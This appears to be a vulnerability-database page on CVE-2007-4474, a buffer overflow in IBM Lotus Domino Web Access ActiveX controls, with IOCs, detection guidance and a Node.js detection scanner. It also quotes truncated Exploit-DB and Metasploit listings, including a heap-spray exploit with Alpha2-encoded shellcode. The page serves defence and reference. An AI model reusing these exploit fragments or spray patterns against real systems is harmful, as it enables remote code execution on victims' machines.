CVE-2007-4474
Published 2007-12-27. Priority P3 (52), critical, CVSS 2.0 base score 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C). Public exploit available. EPSS 44.18% (98.6th percentile).
Multiple stack-based buffer overflows in the IBM Lotus Domino Web Access ActiveX control, as provided by inotes6.dll, inotes6w.dll, dwa7.dll, and dwa7w.dll, in Domino 6.x and 7.x allow remote attackers to execute arbitrary code, as demonstrated by an overflow from a long General_ServerName property value when calling the InstallBrowserHelperDll function in the Upload Module in the dwa7.dwa7.1 control in dwa7w.dll 7.0.34.1.
Affected
17 ranges indexed, all IBM Domino Web Access; version bounds and fixed versions are not populated on this page (the description names Domino 6.x and 7.x).
| Vendor | Product | Ranges indexed | Version range | Fixed in |
|---|---|---|---|---|
| ibm | domino_web_access | 15 | — | — |
| ibm | lotus_domino_web_access | 2 | — | — |
Detection & IOCs (extracted from sources)
Byte patterns:
- 0x0C0C0C0C: the address the overwritten SEH/return pointer is directed to, inside the sprayed heap (Windows XP SP0-SP2 with IE 6.0 SP0-2 and IE 7.0).
- %u03eb%ueb59%ue805%ufff8%uffff: prefix of the Alpha2-encoded win32_exec (calc.exe) shellcode. Decoded little-endian it is eb 03 59 eb 05 e8 f8 ff ff ff, the Alpha2 decoder's getPC stub.
- %u03eb%ueb59%ue805%ufff8%uffff: the same prefix on the Alpha2-encoded win32_bind (LPORT=4444) shellcode. The stub does not depend on the payload, so it identifies the encoder rather than a specific payload.
Detection guidance:
- Detect ActiveX instantiation of the vulnerable ProgID 'dwa7.dwa7.1' in browser context; it corresponds to the vulnerable Upload Module control in dwa7w.dll.
- Monitor browser processes (iexplore.exe) on Windows XP with IE 6/7 for heap-spray patterns that use the 0x0C0C0C0C address; these indicate exploitation of this vulnerability.
- Detect JavaScript heap sprays built with unescape() from large NOP sleds (%u9090%u9090) combined with the Alpha2-encoded shellcode prefix (%u03eb%ueb59%ue805%ufff8%uffff) in HTML pages; this is the hallmark of the exploit's delivery mechanism.
- Alert on calls to InstallBrowserHelperDll on the IBM Lotus Domino Web Access ActiveX controls (inotes6.dll, inotes6w.dll, dwa7.dll, dwa7w.dll) after an unusually long string has been assigned to General_ServerName.
Caveats:
- The Metasploit module randomizes all JavaScript variable names on each request, so signatures keyed on variable names will not reliably detect this exploit; match on the constants above instead.
- The exploit targets only Windows XP SP0-SP2 with IE 6.0 SP0-2 and IE 7.0 (English); the 0x0C0C0C0C address is platform-specific and may not apply to other OS/browser combinations.
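As an added example (not from this page, and not code from the Metasploit or Exploit-DB modules it lists), the following Node.js scanner applies the guidance above to raw HTML. It matches only the constants the sources document (the ProgID, the General_ServerName / InstallBrowserHelperDll pair, the 0x0C0C0C0C address, %u9090 NOP-sled seeds and the Alpha2 getPC stub) after decoding unescape()-style literals into the bytes they occupy in memory, so the randomized variable names do not matter. Both sample pages are constructed for the example; the "malicious" one mimics the delivery pattern with randomized identifiers and only the truncated shellcode prefix, so it is not a working exploit. The function names (scanHtml, decodeUnescapeLiteral, extractStringLiterals, isNopSled) are my own.

```javascript
// Added example, not part of the page or of the Metasploit/Exploit-DB modules it lists.
// Content-based scanner for the CVE-2007-4474 delivery pattern (Node.js, no dependencies).
// It keys on the constants documented above and never on JavaScript identifier
// names, because the Metasploit module randomizes those on every request.

// Alpha2 getPC stub: %u03eb%ueb59%ue805%ufff8%uffff decoded little-endian.
const ALPHA2_GETPC = Buffer.from([0xeb, 0x03, 0x59, 0xeb, 0x05, 0xe8, 0xf8, 0xff, 0xff, 0xff]);
// Heap-spray target address 0x0C0C0C0C as it appears in memory.
const SPRAY_ADDR = Buffer.from([0x0c, 0x0c, 0x0c, 0x0c]);

// Decode an unescape()-style literal to the bytes it occupies in memory:
// %uXXXX is a 16-bit code unit stored little-endian, %XX a single byte,
// any other character its low byte.
function decodeUnescapeLiteral(lit) {
  const bytes = [];
  const re = /%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})|([\s\S])/g;
  let m;
  while ((m = re.exec(lit)) !== null) {
    if (m[1] !== undefined) {
      const v = parseInt(m[1], 16);
      bytes.push(v & 0xff, v >>> 8);
    } else if (m[2] !== undefined) {
      bytes.push(parseInt(m[2], 16));
    } else {
      bytes.push(m[3].charCodeAt(0) & 0xff);
    }
  }
  return Buffer.from(bytes);
}

// Every single- or double-quoted string literal in the page, in document order,
// so literals the exploit splits with '+' across lines are examined together.
function extractStringLiterals(text) {
  const re = /"((?:[^"\\\n]|\\.)*)"|'((?:[^'\\\n]|\\.)*)'/g;
  const out = [];
  let m;
  while ((m = re.exec(text)) !== null) out.push(m[1] !== undefined ? m[1] : m[2]);
  return out;
}

// A literal that decodes to nothing but 0x90 is a NOP-sled seed (%u9090%u9090).
function isNopSled(buf) {
  return buf.length >= 4 && buf.every((b) => b === 0x90);
}

function scanHtml(html) {
  const decoded = extractStringLiterals(html).map(decodeUnescapeLiteral);
  const joined = Buffer.concat(decoded);
  const indicators = {
    vulnerableProgId: /dwa7\.dwa7\.1/i.test(html),
    generalServerName: /General_ServerName/i.test(html),
    installBrowserHelperDll: /InstallBrowserHelperDll/i.test(html),
    sprayAddress: joined.includes(SPRAY_ADDR) || /0x0c0c0c0c/i.test(html),
    nopSled: decoded.some(isNopSled),
    alpha2GetPc: joined.includes(ALPHA2_GETPC),
    // "while (x.length < N) x += x" is how sled and spray blocks are grown.
    growthLoop: /while\s*\(\s*[A-Za-z_$][\w$]*\.length\s*</.test(html),
  };
  // Require both a reference to the vulnerable control and a memory-corruption
  // artifact; a growth loop on its own is ordinary JavaScript.
  const targetsControl = indicators.vulnerableProgId || indicators.installBrowserHelperDll || indicators.generalServerName;
  const memoryCorruption = indicators.sprayAddress || indicators.alpha2GetPc || (indicators.nopSled && indicators.growthLoop);
  return { indicators, verdict: targetsControl && memoryCorruption };
}

// CONSTRUCTED sample: mimics the delivery pattern described above with randomized
// identifiers and only the truncated shellcode prefix; it is not a working exploit.
const MALICIOUS_SAMPLE = `<html><body><script>
var kQz = new ActiveXObject("dwa7.dwa7.1");
var rYp = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +
                   "%u4948%u4949%u4949%u4949");
var nLm = unescape("%u9090%u9090");
while (nLm.length < 0x40000) nLm += nLm;
var hWq = new Array();
for (var i = 0; i < 200; i++) hWq[i] = nLm + rYp;
var sEh = unescape("%u0c0c%u0c0c");
var bUf = "";
while (bUf.length < 10000) bUf += sEh;
kQz.General_ServerName = bUf;
kQz.InstallBrowserHelperDll();
</script></body></html>`;

// CONSTRUCTED benign sample: unescape() and a growth loop, but no vulnerable control.
const BENIGN_SAMPLE = `<html><script>
var req = new ActiveXObject("Microsoft.XMLHTTP");
var pad = unescape("%u0041%u0042");
while (pad.length < 100) pad += pad;
</script></html>`;

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(scanHtml(MALICIOUS_SAMPLE), null, 2));
  console.log(JSON.stringify(scanHtml(BENIGN_SAMPLE), null, 2));
}
```

Run with `node scan.js` to print both verdicts. The decision rule deliberately needs two independent classes of evidence: the benign page trips the growth-loop indicator alone and is not flagged, while the spray address and the getPC stub are checked on decoded bytes, so splitting a literal across concatenated strings or writing the address as %u0c0c%u0c0c instead of 0x0C0C0C0C does not evade the match.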
No detection rules found.
Exploit-DB: IBM Lotus Domino Web Access Upload Module - Remote Buffer Overflow (Metasploit)
exploitdb · 2010-09-20 · CVE-2007-4474
---
```ruby
##
# $Id: ibmlotusdomino_dwa_uploadmodule.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'IBM Lotus Domino Web Access Upload Module Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in IBM Lotus Domino Web Access Upload Module.
          By sending an overly long string to the "General_ServerName()" property located
          in the dwa7w.dll and the inotes6w.dll control, an attacker may be able to execute
          arbitrary code.
      },
      # ... listing truncated on the source page
```
Exploit-DB: IBM Domino Web Access Upload Module - Overwrite (SEH)
exploitdb · 2008-02-13 · CVSS 9.3 · CVE-2007-4474 [CRITICAL]
---
IBM Domino Web Access Upload Module Universal BoF Exploit
```javascript
function Check() {
    // win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com
    var shellcode1 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +
        "%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" +
        "%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" +
        "%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" +
        "%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" +
        "%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" +
        "%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" +
        "%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c" +
        "%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831" +
        "%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u59
    // ... listing truncated on the source page
```
Exploit-DB: IBM Domino Web Access 7.0 Upload Module - 'inotes6.dll' Remote Buffer Overflow
exploitdb · 2007-12-30 · CVSS 9.3 · CVE-2007-4474 [CRITICAL]
---
IBM Domino Web Access Upload Module inotes6.dll SEH Overwrite Exploit
```javascript
function Check() {
    var buf = 'A';
    while (buf.length
    // ... listing truncated on the source page
```
Unable to create object
# milw0rm.com [2007-12-30]
Exploit-DB: IBM Domino Web Access Upload Module - 'dwa7w.dll' Remote Buffer Overflow
exploitdb · 2007-12-30 · CVSS 9.3 · CVE-2007-4474 [CRITICAL]
---
IBM Domino Web Access Upload Module dwa7w.dll SEH Overwrite Exploit
```javascript
function Check() {
    var buf = unescape("%u4141");
    while (buf.length
    // ... listing truncated on the source page
```
Unable to create object
# milw0rm.com [2007-12-30]
Metasploit: IBM Lotus Domino Web Access Upload Module Buffer Overflow
This module exploits a stack buffer overflow in IBM Lotus Domino Web Access Upload Module. By sending an overly long string to the "General_ServerName()" property located in the dwa7w.dll and the inotes6w.dll control, an attacker may be able to execute arbitrary code.
No writeups or analysis indexed.
References
- http://lists.grok.org.uk/pipermail/full-disclosure/2007-December/059233.html
- http://osvdb.org/40954
- http://secunia.com/advisories/28184
- http://www.kb.cert.org/vuls/id/963889
- http://www.securityfocus.com/bid/26972
- http://www.securitytracker.com/id?1019138
- http://www.vupen.com/english/advisories/2007/4296
- https://exchange.xforce.ibmcloud.com/vulnerabilities/39175
- https://www.exploit-db.com/exploits/4818
- https://www.exploit-db.com/exploits/4820
- https://www.exploit-db.com/exploits/5111